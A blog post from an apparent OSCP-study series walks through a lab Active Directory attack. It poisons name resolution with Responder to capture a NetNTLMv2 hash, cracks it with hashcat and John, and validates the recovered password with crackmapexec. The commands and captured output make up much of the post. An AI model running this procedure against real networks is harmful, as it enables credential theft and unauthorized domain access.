Total Pageviews

Sunday, September 12, 2021

Active Directory CORPORATIVE.domain.local Series[II] : Responder attack

  Hi everyone,


So far so good, i hope that you 've read my last post on reoadtoOSCP blog of Active Directory series[I], In that post i described the architecture environment that we are going to use during this series[XX] of attacks in our local corporate domian.


In that case we are going to execute the responder attack and bruteforce crack offline attack in order to abuse of the hash type netNtlmV2, that the windows actives includes in active directory domian. It use for authentication and authorization purposes when a logged  user use a shared folders between hosts of the network. This si samething common on companies environment.

The first point of the day is present the architecture of  domain controller interaction and the minimal configuration that we need to implement for exploit successfully this kind of attack.

Actual Design:



Minimal configuration required:

    - Windows server 2016 [Domain Controller]

    - Windows 10 [WKS-001]

    - Windows 10 [WKS-002]

    - Kali Linux [Attacker machine]

From the server configuration side I present the evidences of the  windows 10 computers that belong to the Domain controller forest CORPORATIVE.DOMAIN.local:



We must include a couple of worker users, that belong to this domain and we are going to use for login process on the computers using its domain accounts:


Network recognition using arp protocol:




Responder Attack Process:

Using the default configuration for responder attack:


We can execute the responder tool using python3 interpreter on interface eth0 with the following parameters -rdw:

 -r, --wredir          Enable answers for netbios wredir suffix queries.

                        Answering to wredir will likely break stuff on the

                        network. Default: False

-d, --NBTNSdomain     Enable answers for netbios domain suffix queries.
                        Answering to domain suffixes will likely break stuff
                        on the network. Default: False
-w, --wpad            Start the WPAD rogue proxy server. Default value is
                        False



And we are ready for start with poisined response network attack. When any user logged on the domain try to access to a shared directory that not exists or is unavailable in this moment we are ready for answer, to this request and getting the NTLMV2 hash, that the system use for an authenticated user:

1. In that case we are goign to make a PoC with the share folder \\IGS:

with user: worker2

from machine: WKS-002


Nice, we got it! :

[*] [MDNS] Poisoned answer sent to 10.0.2.16       for name IGS.local

[*] [LLMNR]  Poisoned answer sent to 10.0.2.16 for name IGS ##Resource

[SMB] NTLMv2-SSP Client   : 10.0.2.16 ##Machine

[SMB] NTLMv2-SSP Username : CORPORATIVE\worker2 ##Domain and user of AD

[SMB] NTLMv2-SSP Hash     : worker2::CORPORATIVE:1d9184c9b45b5c3e:51A9BC8AB2022DB4266C71062EB8A9EF:0101000000000000C0653150DE09D2010274D680784A2046000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000C4481FA5F23D6548D9140D944CA0EAF3D5004B8534BF51DBBB50DE9B359BA7EE0A001000000000000000000000000000000000000900100063006900660073002F004900470053000000000000000000                                                                                                                                                                                                                 

[*] [MDNS] Poisoned answer sent to 10.0.2.16       for name IGS.local


Now we are ready to perform an offline dictionary attack in order to obtain the hash ntlmv2 credentials on plain text and log in the domain using the tuple (user.credentials).

Using for example the following tools:

kali@kali:~$ echo "worker2::CORPORATIVE:1d9184c9b45b5c3e:51A9BC8AB2022DB4266C71062EB8A9EF:0101000000000000C0653150DE09D2010274D680784A2046000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000C4481FA5F23D6548D9140D944CA0EAF3D5004B8534BF51DBBB50DE9B359BA7EE0A001000000000000000000000000000000000000900100063006900660073002F004900470053000000000000000000" > hashNtlmv2_worker2

1. johntheripper with a dictionary attack: /usr/share/wordlist/rockyou.txt

kali@kali:~$ sudo john --format=netNtlmV2 hashNtlmv2_worker2 --wordlist= /usr/share/wordlists/rockyou.txt 

2. hashcat with ntlmv2 type and dictionary attack: /usr/share/wordlist/rockyou.txt

kali@kali:~$ sudo hashcat -m 5600 hashNtlmv2_worker2 /usr/share/wordlists/rockyou.txt 

[sudo] password for kali: 

hashcat (v6.1.1) starting...

Results:




kali@kali:~$ sudo hashcat -m 5600 hashNtlmv2_worker2 /usr/share/wordlists/rockyou.txt --show

[sudo] password for kali: 

WORKER2::CORPORATIVE:1d9184c9b45b5c3e:51a9bc8ab2022db4266c71062eb8a9ef:0101000000000000c0653150de09d2010274d680784a2046000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d20106000400020000000800300030000000000000000000000000200000c4481fa5f23d6548d9140d944ca0eaf3d5004b8534bf51dbbb50de9b359ba7ee0a001000000000000000000000000000000000000900100063006900660073002f004900470053000000000000000000:Passw0rd1



Fingerprint for SMB services:

kali@kali:/usr/share/responder/tools$ python3 RunFinger.py -i 10.0.2.0/24

Retrieving information for 10.0.2.17...

SMB signing: False

Null Sessions Allowed: True

Server Time: 2021-09-12 15:35:21

OS version: 'Windows Server 2016 Standard Evaluation 14393'

Lanman Client: 'Windows Server 2016 Standard Evaluation 6.3'

Machine Hostname: 'CORPORATIVE-DOM'

This machine is part of the 'CORPORATIVE' domain

RDP port open: 'True'


Validate credentials:

We can verify with crackmapexec tool that the SMB service is allowed an active

crackmapexec smb 10.0.2.0/24

SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DOMAIN.local) (signing:True) (SMBv1:True)

 

And finally, rigth now we can validate the credentials, using the following command:

crackmapexec smb 10.0.2.17 -u "worker2" -p "Passw0rd1" -d "CORPORATIVE.DONAIN"

SMB         10.0.2.17       445    CORPORATIVE-DOM  [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:CORPORATIVE-DOM) (domain:CORPORATIVE.DONAIN) (signing:True) (SMBv1:True)

SMB         10.0.2.17       445    CORPORATIVE-DOM  [+] CORPORATIVE.DONAIN\worker2:Passw0rd1 


Access to Domain Controller :


Using the previous infromation, RDP port open == True on Windows server 2016 target machine and the credentilas for the domain user worker2:



And this is all for the first Active directory attack, I hope that you enjoy with my second windows entry and you'll follow my blog [https://roadtooscp-f0ns1.blogspot.com/]. We'll keep in touch.

with kind regards, f0ns1

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Mi primera experiencia en una conferencia:

En la jornada posterior a un evento importante toca analizar, en este caso me centro en mi participación como speaker en #librecon2022. ¿Cóm...